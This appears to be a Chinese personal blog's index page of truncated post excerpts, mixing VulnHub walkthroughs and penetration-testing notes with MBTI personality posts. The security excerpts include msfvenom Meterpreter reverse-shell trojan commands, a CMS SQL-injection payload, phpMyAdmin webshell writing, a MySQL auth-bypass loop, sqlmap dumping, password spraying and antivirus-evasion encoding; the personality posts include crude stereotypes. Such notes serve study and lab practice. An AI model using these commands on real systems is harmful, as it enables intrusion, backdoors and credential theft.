X_T

靶机下载地址：https://www.vulnhub.com/entry/napping-101,752/ 教程链接地址：https://readysetexploit.gitlab.io/home/vulnhub/napping/ # 确认攻击目标 攻击机 KALI： 192.168.31.135 靶机 NAPPING：桥接于 192.168.31.1 的网卡，ip 未知 通过 netdiscover 扫描当前网卡里边有哪些机器 sudo netdiscover -i eth0 -r 192.168.31.0/24 将所有已知的 ip 暂时存档，对这类 ip...

靶机下载地址：https://www.vulnhub.com/entry/evm-1,391/ 教程链接地址：https://blog.csdn.net/liver100day/article/details/119276797 # 确认攻击目标 攻击机 KALI：192.168.31.135 靶机 EVM：桥接于 192.168.31.1 的网卡，ip 未知 通过 netdiscover 扫描当前网卡里边有哪些机器 sudo netdiscover -i eth0 -r 192.168.31.0/24 将所有已知的 ip 暂时存档，对这类 ip 地址不做端口扫描 1234#...

# 极端说法 e 社交达人，少注重自身成长和内省思考 i 自闭人，社恐，活在自己的世界里，更细腻敏感 n 思维跳脱，叙事不清晰，说话抽象 s 目光短浅，只注重表象，大多智商平平，毫无洞察力 t 不重视情感，冷血无情，不好相处，无情商 f 恋爱脑，无逻辑，敏感脆弱，感情过剩 j 执行狂人，绝不拖延，莽撞，目光短浅 p 拖延癌，效率极低，思维更灵活 #...

最明显的气质就是纯真，就像一个顽皮的小孩子，什么都要试一试。 # 性格特征 我不幸福，是因为我不够聪明，我看的不够透。 希望别人可以理解自己的奇特言行与思想。 喜欢钻研一个问题钻研的很深，得到解答后就心满意足，懒得想要怎么通俗易懂的表达给他人听。 强烈好奇心，重度拖延症，完美主义者。认为内在远比外在重要。 生活技能仅能自给自足，多数时候是被照顾的那个。 运用思维逻辑进行思考、探索各种原理和可能性才是他们最喜欢的状态，完成任务是次要的。 会本能的寻找 ni，即 infj/intj 这两类恋人 神 / 魔，神魔只在一念之间，上帝本尊，最能模拟 “道”...

通常很安静、温柔，看起来比较软。他们看起来” 软 “，但是内心却极为坚定，不容撼动。 # 性格特征 会经常性感到孤独，他们的孤独来自于不被人” 理解 “。他们很难遇到完全理解自己的另一个人。他们似乎是漂泊在这个无人欣赏他们的世界。 有着自己理想的朋友，会发现现实中的朋友们总是会和自己的想象中不太一样，进而产生无人理解的孤独感。 会时常沉浸在自己的思索中，而且外人很难看出来。他们会探索自己的内在本质，沉浸在自己的心灵中。 喜欢” 美...

# SJ - 秩序守卫者 SJ 人格的核心词汇就是 “教条”。他们是规则的拥戴者，生活的大事小情都在围绕着自己内心认定的准则进行，有时显得十分固执。 # ESTJ 霸道总裁，日常管理，雷厉风行，作风强悍，精力旺盛，粗犷豪迈，声如洪钟。刺头，干涉主义，人缘不大好，治安重点。抠门，或曰俭朴。没理也要压你一头。 ESTJ 对身边的事物充满控制欲，希望对人和事都有一种绝对的驾驭，不希望别人违背他们的命令 # ISTJ 公务员，官僚，大管家。沉稳老练，老成持重，个性中庸，极为自律。实用主义，循规蹈矩，追求形式，重视细节，完美主义。忠诚的执行者。 ISTJ 的 “教条主义”...

# 外倾 — 内倾 （能量更集中地指向） E: 外向即交往是人的本质，孤独是种折磨，说话是常态。交往让他获取能量，愈加兴奋。 I: 内向即使内心归于平静才是人的追求，孤独是种享受，沉默是常态。交往让他耗费能量，愈加交瘁。 # E 与他人相处精力充沛 希望成为注意的焦点 行动，之后思考 喜欢边想边说出声 易于 “读” 和了解；随意地分享个人信息 说的比听的多 高度热情地社交 反应快，喜欢快节奏 重于广度而不是深度 #...

每一个新鲜事物都会想要打开门进去瞅一眼，但当大致了解了这个东西的整体运作方式之后，就会失去兴趣。容易陷入天赋错觉。心态极其浮躁。 # 性格特征 在人际交往中总是担心会麻烦到别人，时常把他人的重要性放在自己之前，总是做一些所有人都不知道的付出。 极端的喜欢和人打交道，并不完全因为喜欢社交，而是喜欢...

热情洋溢、远见卓识、客观公正、认真负责。机智灵活，能够服众，在多数情况下，其他人也乐得听从调遣，然后就渐渐地依赖于他们。 #...

友好、富有同情心和责任感，他们把同别人的关系放在十分重要的位置，所以他们往往热心、健谈、受人欢迎、有礼貌、渴望取悦他人。 # 性格特征 具有和睦的人际关系，并且通过很大的努力以获得和维持这种关系。很现实，讲求实际、实事求是，安排有序，小心谨慎，也非常传统化。 总会无微不至的热情满满的为你提供各种便利和服务。酒逢知己千杯少，话不投机我也说；感情浅，舔一舔，感情深，一口闷！ 可以简单理解为 ESFJ 是哪里人多往哪里钻，“害羞”“不熟” 这种词在 ESFJ...

不甘寂寞，乐观、幽默、好奇心重，喜欢动脑筋，好争辩、创意十足，不愿意做那些他们认为枯燥无味的事情。可以叫他们发明家，智多星，冒险家。 # 性格特征 具备一种对系统的结构缺陷或者理论的逻辑漏洞高度敏感的品质，很容易发现理论或者优化中哪里可以改进、哪里可以优化。 办法、点子和创意多，很擅长用一些别人想不到的新办法、新点子来解决各种难题，天生就是创意机器。好像灵感永远不会枯竭似的。 尽量避免与 ENTP...

他们严谨、保守、敏感、友善、乐于助人，“贼能忍”。特征可以理解为让大家远离各种不好的东西，也就是保护，所以我更喜欢叫他们保护者。 # 性格特征 喜欢并且也擅长从事一些保护其他人的工作，他们有一种使他人远离危险、免受伤害的本能。在照顾老人和儿童方面，ISFJ...

在视野风格上，SJ 是恪守传统的过去主义者，NF 和 NT 是追逐机会成本的未来主义者，SP 是关注此时此刻的现实主义者；而 estp 是现实主义者中的现实主义者，他们是所有类型人中最现实主义导向的类型。 # 组合字母含义 NF 都对人性敏感，都本能地关注人性的成长和人生的发展问题，但四种 NF 对这些问题的态度不同。 ENFP 会去关注人生的各种有趣的可能性，INFP 则会不断地追问人生的意义，但 P 型的 NF 都不太喜欢所谓的 “正确答案”，因为正确答案就意味着封闭，意味着有定论后就不需要再讨论了。 ENFJ 和 INFJ 会倾向于认为各种人生大问题都是有 “正确答案”...

总想去抓住光，可它没有形状，抓不住也不敢直视。 # 1.msf 生成木马 参考地址：https://blog.csdn.net/qq_42094992/article/details/109004560 123456789101112131415161718192021222324252627282930313233343536#windowsmsfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.200.209 LPORT=8888 -f exe >...

# php 代码审计 # php sql 注入 1day 去敏 cnvd 漏洞复现： 梦想 CMS 后台 Bo***.cl***.php 文件存在 SQL 注入漏洞 漏洞说明:https://www.cnvd.org.cn/flaw/show/CNVD-2020-59466 http://localhost:8081/lmxcms1.4/admin.php?m=book&a=reply&id=1)%20and% 20updatexml(0,concat(0x7e,user()),1)%23 通过寻找到漏洞存在的文件，查找相关的 sql...

# webshell 提权 # phpmyadmin 突破 phpadmin 通过后台写 sql 拿 webshell 1234567891011121314151617# 显示当前目录show variables like '%datadir%';或 select @@basedir;# 查看数据库当前操作用户拥有写权限show global variables like '%secure_file_priv%';# 写入后门select '<?php...

# APP 信息收集 有很多小工具就可以完成部分信息收集，但是信息收集不完整 APK Messenger - 基本信息、资源文件与开启权限等，可以提取到此 apk 中的 图片资源，xml 资源，其他数据等。 # AppInfoScanner 采集 一款适用于以 HW 行动 / 红队 / 渗透测试团队为场景的移动端 (Android、iOS、 WEB、H5、静态网站) 信息收集扫描工具，可以帮助渗透测试工程师、攻击队 成员、红队成员快速收集到移动端或者静态 WEB 站点中关键的资产信息并提供...

# 有 waf 时的信息收集 # 信息收集拦截对抗 信息收集常见检测： 脚本或工具速度流量快 脚本或工具的指纹被识别 脚本或工具的检测 Payload 信息收集常见方法： 延迟：解决请求过快封 IP 的情况 代理池：在确保速度的情况下解决请求过快封 IP 的拦截 白名单：模拟白名单模拟 WAF 授权测试，解决速度及测试拦截，换大型网站爬虫 UA 模拟用户：模拟真实用户数据包请求探针，解决 WAF 指纹识别 被动扫描方式 黑暗引擎：Fofa Quake Shodan zoomeye 0.zone...

# 服务漏洞探测 服务漏洞发现指的是发现搭建在操作系统上的服务漏洞。 # 相关工具介绍 相关工具说明 Acunetix 一款商业的 Web 漏洞扫描程序，它可以检查 Web 应用程序中的漏 洞，如 SQL 注入、跨站脚本攻击、身份验证页上的弱口令长度等。它拥有一个 操作方便的图形用户界面，并且能够创建专业级的 Web 站点安全审核报告。新 版本集成了漏洞管理功能来扩展企业全面管理、优先级和控制漏洞威胁的能力。 Burp Suite 是用于攻击 web 应用程序的集成平台，包含了许多工具。Burp Suite 为这些工具设计了许多接口，以加快攻击应用程序的过程。所有工具都共...

# 接口分类 SOAP (Simple Object Access Protocol) 简单对象访问协议是交换数据的一 种协议规范，是一种轻量的、简单的、基于 XML (标准通用标记语言下的一个 子集) 的协议，它被设计成在 WEB 上交换结构化的和固化的信息。SOAP 不是 Web Service 的专有协议。SOAP 使用 HTTP 来发送 XML 格式的数据，可以简单 理解为：SOAP = HTTP +XML。 REST (Representational State Transfer) 即表述性状态传递，在三种主流的 Web 服务实现方案中，因为 REST 模式的 Web 服务与复杂的...

# 数据库安全 注意各种漏洞的产生都与其版本和其相关配置是否安全有关 # mysql 未授权访问 123# CVE-2012-2122 利用 for i in `seq 1 1000`; do mysql -uroot -pwrong -h your-ip -P3306 ; done # 通过此漏洞不断的访问 mysql，最终可以无需认证进入数据库，但 是这个是很早之前的漏洞了，基本上已经销声匿迹了。 # hadoop 未授权 RCE 123456789101112131415161718import requeststarget =...

# Java19 安装 mac 安装 java 19 的操作步骤如下 12345678# 下载高版本的jdkhttps://www.oracle.com/java/technologies/downloads/#jdk19-macwget https://download.oracle.com/java/19/latest/jdk-19_macos-aarch64_bin.dmg#...

# sql 注入 # sqlmap 测试 123456789101112131415161718192021222324# sqlmap 测试是否存在sql注入：sqlmap -r sqlmap.txt --batch --dbssqlmap -r sqlmap.txt --batch -D Machine --tablessqlmap -r sqlmap.txt --batch -D Machine -T login --columnssqlmap -r sqlmap.txt --batch -D Machine -T login -C username,password,role...

# vpc 项目 # vpc1 1234567通过 web 漏洞拿到 web 服务器的权限，用后门工具连接后，上传 cs 的马进 行上线。对 web 服务器进行域内信息收集，端口扫描，mimikatz 运行，导出部分凭 据和明文。设置代理转发端口，利用 proxychains 代理流量并用 CrackMapExec 工具进行域用户和本地用户的密码喷射，得到 windows 7 的本地用户权限，通 过端口转发上线此台机器。win7 的域用户 hash 和明文进行喷射时发现没有效果。在 windows7 上进行 spn 扫描，识别到了 mssql 服务器，利用注册表命令对 navicat...

# 源码层面免杀 # c 免杀 木马生成 12345# cs/msf 木马cs->攻击->生成后门->payload生成windows可执行程序->选择监听器->生成msf-> msfvenom -p windows/meterpreter/reverse_tcp lhost=x.x.x lport=8079 -f cmsf-> msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 6 -b...